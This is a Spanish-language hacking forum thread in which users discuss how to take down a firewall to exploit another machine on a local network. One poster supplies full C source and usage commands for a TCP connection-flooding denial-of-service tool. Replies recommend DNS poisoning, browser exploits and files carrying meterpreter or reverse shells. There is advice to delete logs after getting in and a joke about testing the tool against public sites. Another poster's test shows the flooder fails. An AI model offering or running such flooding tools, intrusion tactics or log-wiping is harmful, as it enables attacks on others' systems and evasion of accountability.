hola
una pregunta... hay quienes dicen que hacer un fuzz al firewall lo tumba, pero que tambien puede tirar el servicio, tambien se dice que se puede docear, solo encontre que es como un DoS, pero no se que tan efectivo sea, y hay otros que dicen que es mejor usar un exploit por browser o bypass
alguien ha tenido un buen resultado con alguno de esos, ya que me gustaria intentar con el fuzz, ya descargue un pdf que dicen que es muy bueno sobre eso y lei en el foro que se puede hacer un socket para hacerlo, pero ademas de hacer eso... cual seria mas recomendable?
y aparte de leer el pdf, espero me puedan dar una explicacion rapida de que hace un fuzzer para tumbar el firewall?, tengo que mandar basura al firewall hasta que falle?, y se tiene que hacer rapido o por partes, porque me imagino que alertara el firewall si se hace rapido, pero no se si esa es la funcion del fuzzer, espero me puedan ayudar
salu2
Intenta acceder a el y poner excepciones o algo... :P
Md: Si, mandar datos hasta que se tumbe, pero hay excepciones, pues a lo mejor controla la cantidad de datos...
Es tan simple como hacer un BoF que sobreescriba el ret con As. Pero si controla los datos... Mira el codigo, desensambla...
Cita de: Sagrini en 2 Enero 2011, 20:46 PM
Intenta acceder a el y poner excepciones o algo... :P
Md: Si, mandar datos hasta que se tumbe, pero hay excepciones, pues a lo mejor controla la cantidad de datos...
Es tan simple como hacer un BoF que sobreescriba el ret con As. Pero si controla los datos... Mira el codigo, desensambla...
Los firewalls no suelen tener este tipo de fallos tan claros y ¿a que te refieres con excepciones?
En mi opinión, la solución depende de varios factores :
- Si el firewall es para toda la red o si es para el ordenador al que tienes acceso.
- Si es para toda la red habría que ver que es lo que permite y que es lo que no permite . (También habría que saber a donde te vas a conectar )
- Si es para el equipo al que tienes acceso depende del SO.
Estas son algunas de las cosas que importan. ¿Puedes especificar?
hola
bueno, miren... esto es o que estaba intentando
estaba tratando de utilizar metasploit, tengo una laptop con windows vista y con el clasico antivirus con firewall, estuve practicando cosas que encontraba con ettercap, pero tuve problemas a la hora de inyeccion de codigo, asi que tratare de buscar algun wifi con athero que han dicho que son buenos para eso
encontre una forma a la que le llamaron ataque ninja con metaspliot, que era lanzar todo tipo de ataque a un puerto vulnerable, pero como el unico puerto que me aparece abierto es 5358 o 5357 no recuerdo bien, pues meta no lanza nada
los demas puertos los encuentro filtrados, alli es donde encontre que se puede tumbar con fuzzer, o docear o la mejor que seria bypass, el problema es que hasta que no tenga un wifi que pueda hacer una buena inyeccion no puedo hacer por ejemplo mandar un exploit por browser, ya que lo intente utilizando ettercap para hacer que sea algo necesario descargar el exploit, pero no lo logre
la otra laptop y esta... estan conectadas a un router por wifi, la que uso tiene linux y quise con metasploit, tratar de explotar el puerto 445 de la otra compu pero como les menciono esta filtrado con el firewall, asi que por eso quise intentar tumbarlo, y con lo que Sagrini menciono me imagino que es mandar basura o 'A' o Nop's hasta que por algun razon desborde la memoria y hacer que se cierre
pero aunque pienso intentarlo, espero me puedan decir si ese metodo les ha llegado a funcionar, o cual es mas seguro que funciono para tambien intentarlo... ahorita tambien estoy leyendo un link que habia sobre bypass, mi unico problema es que mi nivel de ensamblador es un poco abajo del basico, si logro entender un poco, pero no muy bien aun.
bueno, espero mas respuestas
salu2 ;D
Yo preferiria utilizar un dns poison, o como dices un exploit por browser, aunque lo mejor seria ingenieria social con algun archivo con meterpreter o reverse shell.
Saludos
Que tal hacer un programita que le abra tantas conexiones que se desborde? :P Es lo mas seguro que he oido aqui xD!
Weno, el code en C es:
#include <time.h> //Hora
#include <stdio.h> //Funciones basicas entrada/salida
#include <string.h> //StrCmp
#include <stdlib.h> //Exit y otras
#include <signal.h> //Señales de salida
#include <arpa/inet.h> //struct sockaddr_in
#include <sys/socket.h> //Socket, Connect...
struct sockaddr_in host;
int sockfd, cont = 0;
void shutup (int signal)
{
printf ("Interrupt signal %d ::: Closing clonnections...\n%d conexions with server\n\n", signal, cont);
close (sockfd);
exit (1);
}
int finalizar (int state)
{
if (state == 1)
{
printf ("Ocurrio un error en tiempo de ejecucion...\n\n");
return 1;
}
else return 0;
}
int main (int argc, char *argv [])
{
time_t now=time (0);
struct tm *ahora;
char hora [40];
ahora=localtime ((const time_t*)&now);
strftime (hora, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("FireVolder 0.1 - By Sagrini (2010) - %s\n", hora);
if (argc != 3)
{
printf ("Use: %s <target_ip> <port>\n\n", argv [0]);
return 1;
}
signal (SIGTERM, shutup);
signal (SIGINT, shutup);
host.sin_port=htons(atoi (argv [2]));
host.sin_family=AF_INET;
host.sin_addr.s_addr=inet_addr (argv [1]);
memset (host.sin_zero, 0, 8);
printf ("Gotting connections with %s:%d...\n", inet_ntoa (host.sin_addr), ntohs (host.sin_port));
while (1)
{
while ((sockfd=socket (2, 1, 0))==1) sleep (1);
while (connect (sockfd, (struct sockaddr*)&host, sizeof (host))==-1) sleep (1);
cont ++;
close (sockfd);
}
return 0;
}
Compila
gcc -o code code.c
Y usa:
./code 192.168.0.1 80
De nadas !
Pd: El code es 100% mio. Es sacado de una "plantilla", un viejo code que tenia por ahi (tmb mio xD)... Me puse a borrar cosas y cambiarlas de sitio y vualá!
Mola el código, pero estoy casi seguro de que no va a funcionar. Sería una vulnerabilidad demasiado sencilla como para que siga funcionando en un firewall de ese tipo.
Si quieres ganar el control de la otra máquina, como te ha dicho r00ty, lo mejor sería hacer un DNS poisoning y encontrar algún exploit para su browser o intentar hacer que se descargue un ejecutable infectado con el meterpreter o algo asi.
Jaja pues no te creas, he visto cosas mucho peores xD ya me entiendes ...
pues tecnicamente en algunos firewalls si va, pork lo que hace es meter muchas conexiones xD... A lo mejor o:
1) Se cae abajo
2) Intenta responderme al desbloquearse, o sea, que se cae tmb.
3) Me guarda la Ip y a la porra las conexiones, o sea, que se cae tmb, pero con mi ip ocho millones de veces repetida jaja
la cosa es que siempre se cae, solo abre conexiones, por lo k a lo mejor, en vez de caerse deja de responder peticiones, y al rato tmb se cae ;)
no lo he probado pero funciona por narices xD...
PD: A ver al despitao, una vez dentro borrad los logs enteritos!!!
Cita de: Sagrini en 3 Enero 2011, 16:33 PM
Jaja pues no te creas, he visto cosas mucho peores xD ya me entiendes ...
pues tecnicamente en algunos firewalls si va, pork lo que hace es meter muchas conexiones xD... A lo mejor o:
1) Se cae abajo
2) Intenta responderme al desbloquearse, o sea, que se cae tmb.
3) Me guarda la Ip y a la porra las conexiones, o sea, que se cae tmb, pero con mi ip ocho millones de veces repetida jaja
la cosa es que siempre se cae, solo abre conexiones, por lo k a lo mejor, en vez de caerse deja de responder peticiones, y al rato tmb se cae ;)
no lo he probado pero funciona por narices xD...
PD: A ver al despitao, una vez dentro borrad los logs enteritos!!!
Vamos a imaginar que si funciona durante un solo minuto. Si es tan sencillo saltarse los firewalls ¿por qué no existen un millón de tutoriales lammers que expliquen esta técnica? ¿ por qué los expertos en malware hacen las virguerías que hacen para evadir a los firewalls ?
Ahora lo pruebo y te contesto.
Weno, yo no lo he provado, pero te aseguro que en algun sitio caera... Y no es tan facil, solo hay que saber programar... :silbar:
Cita de: Sagrini en 3 Enero 2011, 17:13 PM
Weno, yo no lo he provado, pero te aseguro que en algun sitio caera... Y no es tan facil, solo hay que saber programar... :silbar:
Probablemente caerá si el firewall lo he programado yo o cualquier otra persona que no tenga absolutamente ni idea sobre seguridad. Nadie se instala un firewall hecho por el mismo o por un amigo.
Y si la técnica funcionara... no crees que habría mil programas que hicieran lo mismo?
Realmente, no se por qué no los hay... :o
Podria probar, pero no tengo un firewall tan potente como para resistir xD
Mod: Y ahora como estoy en Win32 pos luego lo pruebo contra Blogger o Tuenti jaja
hola
gracias por las respuestas
si el metodo funciona 100% o si es algo muy lammer, no importa para mi, yo solo quiero aprender y no quedarme con una sola tecnica, talvez en algun momento me sirva de algo... sin embargo, si suena un poco logico que los firewalls ya se esten previniendo para eso, pero no creo que sea 100% seguro que esten totalmente protegidos... si no esta muy publicada esta tecnica es porque todavia a de servir...
y como mencionaba, necesito aun un buen wifi que pueda hacer sin errores lo que mencionan del browser e incluso inyeccion de codigo con ettercap, de todas formas no estoy tan preocupado por usar metasploit, tengo una shell reverse que hice con inyeccion a dll y con mandarla por browser es mas de lo que necesito... solo que son mis primeras pruebas con metasploit y no quiero quedarme atras en conocerlo y saber utilizarlo...
por esa razon, no importa si son metodos profesionales o lammer, la cosa es aprender y calmar la curiosidad de intentarlo y ver que pasa... bueno, gracias de nuevo
P.D. esta muy bueno el code, no quiero hacer un copy & paste, asi que tratare de hacer el mio guiandome con el tuyo
gracias ;D
Esta mañana lavandome me he dado cuenta de un buen fallo en mi code.... Es sencillamente debil. Necesitariamos millones de PCs para tirar abajo un firewall. Para solucionarlo le podeis meter algo como un "fork" antes del while (1)...
Necesitaria meterle algo para seguir conectado al server, pero seguir pudiendo usar el socket...
Es muy perfeccionable...
PD: Pensare en ello...
Que tal un socket_reuseadd? Podria funcionar...
Cita de: Sagrini en 4 Enero 2011, 11:49 AM
Esta mañana lavandome me he dado cuenta de un buen fallo en mi code.... Es sencillamente debil. Necesitariamos millones de PCs para tirar abajo un firewall. Para solucionarlo le podeis meter algo como un "fork" antes del while (1)...
Necesitaria meterle algo para seguir conectado al server, pero seguir pudiendo usar el socket...
Es muy perfeccionable...
PD: Pensare en ello...
Que tal un socket_reuseadd? Podria funcionar...
No, no va a funcionar. Ya he dicho arriba el porqué.
si arreglo eso si que funcionara pero ahora tengo que encontrar un disco perdido asi que ya lo hare luego jaja...
no, pero si lo arreglo si va...
Vale, ya he hecho una prueba.
En mi red local, tengo la ip : 192.168.1.37. He configurado iptables para que no me deje conectarme a mi propio ordenador a través de esa interfaz de red (con la ip 127.0.0.1 si que puedo conectarme).
# iptables -A INPUT -s 192.168.1.37 -j DROP
He copiado el source de Sagrini y lo he compilado en un binario llamado "c" , tras eso, he escrito este script en bash :
#!/bin/bash
COUNTER=0
while [ $COUNTER -lt 200 ]; do
./c 192.168.1.37 80& #Tengo un webserver escuchando
echo "Abiertos "$COUNTER" instancias del programa"
let COUNTER=COUNTER+1
done
read
Lo he ejecutado y lo he dejado aproximadamente 2 minutos, después de esos 2 minutos le he dado a control-c para parar el programa y todas las instancias del programa me han dicho que han conseguido 0 conexiones. Luego me he dirigido a mi navegador, he escrito en la barra de dirección "192.168.1.37" y evidentemente seguía sin dejar que me conectara .
Bueno, ya hay ahí una prueba. Si no me crees, pruebalo tú.
Te he dicho que lo he ejecutado 200 veces y no más porque hay un límite? Por mucho que le pongas fork no puedes sobrepasar el límite y no se diferenciará mucho de lo que yo he hecho.
Te he dicho que iptables es para configurar el firewall de linux?
De acuerdo, muy bien, lo se, pero los firewalls no tienen por defecto que no me puedo conectar conmigo mismo...
Y claro, sigue ejecutando que no podras...
Citar
Necesitaria meterle algo para seguir conectado al server, pero seguir pudiendo usar el socket... Es muy perfeccionable...
Si miras bien aun no lo he modificado.... :o :O :o
Me parece que no has entendido bien el ejemplo , se supone que el que ejecuta el script es el atacante. La ip de la regla del iptables es la del atacante. Los argumentos que se pasan a tu programa son los de la víctima.
Por mucho que mejores el programa va a seguir consiguiendo lo mismo, ya lo probaremos cuando lo mejores.
Por cierto, como es que está borrado tu post anterior?
¡ Pues realmente no tengo ni idea !